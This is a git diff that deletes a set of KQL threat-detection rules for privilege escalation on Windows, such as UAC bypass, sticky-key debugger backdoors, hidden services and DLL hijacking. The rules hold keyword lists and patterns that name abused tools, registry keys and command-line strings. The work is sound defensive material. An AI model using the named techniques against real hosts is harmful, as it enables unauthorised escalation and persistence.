--- a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql
deleted file mode 100644
index 0897182f..00000000
--- a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/PowerShell_Profile_Modification.kql b/Privilege Escalation/PowerShell_Profile_Modification.kql
deleted file mode 100644
index cfccee4d..00000000
--- a/Privilege Escalation/PowerShell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql b/Privilege Escalation/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql b/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql
deleted file mode 100644
index f767153d..00000000
--- a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\"
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index db3f32f1..00000000
--- a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index c6201772..00000000
--- a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Regedit_as_Trusted_Installer.kql b/Privilege Escalation/Regedit_as_Trusted_Installer.kql
deleted file mode 100644
index a45472ea..00000000
--- a/Privilege Escalation/Regedit_as_Trusted_Installer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/27
-// Level: high
-// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql b/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql
deleted file mode 100644
index e67eb044..00000000
--- a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/12/05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql b/Privilege Escalation/Rundll32_Registered_COM_Objects.kql
deleted file mode 100644
index 314c9c8a..00000000
--- a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: high
-// Description: load malicious registered COM objects
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Privilege Escalation/Sdclt_Child_Processes.kql b/Privilege Escalation/Sdclt_Child_Processes.kql
deleted file mode 100644
index 40ba4dfa..00000000
--- a/Privilege Escalation/Sdclt_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
deleted file mode 100644
index 7cd541b4..00000000
--- a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/ServiceDll_Hijack.kql b/Privilege Escalation/ServiceDll_Hijack.kql
deleted file mode 100644
index fb9f8be0..00000000
--- a/Privilege Escalation/ServiceDll_Hijack.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/02/04
-// Level: medium
-// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-This is often used as a method of persistence.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql b/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql
deleted file mode 100644
index 3d4deb59..00000000
--- a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql b/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql
deleted file mode 100644
index 0509bca7..00000000
--- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
deleted file mode 100644
index 0a1e634c..00000000
--- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceRegistryEvents
-| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspect_Svchost_Activity.kql b/Privilege Escalation/Suspect_Svchost_Activity.kql
deleted file mode 100644
index 0c14e8e3..00000000
--- a/Privilege Escalation/Suspect_Svchost_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: David Burkett, @signalblur
-// Date: 2019/12/28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql b/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql
deleted file mode 100644
index d536982c..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
-// Tags: attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql b/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql
deleted file mode 100644
index b25dfd18..00000000
--- a/Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql b/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql
deleted file mode 100644
index 8a4f2a41..00000000
--- a/Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/09/06
-// Level: high
-// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
deleted file mode 100644
index df06d4d8..00000000
--- a/Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022/05/04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_New_Service_Creation.kql b/Privilege Escalation/Suspicious_New_Service_Creation.kql
deleted file mode 100644
index 2450ee8b..00000000
--- a/Privilege Escalation/Suspicious_New_Service_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
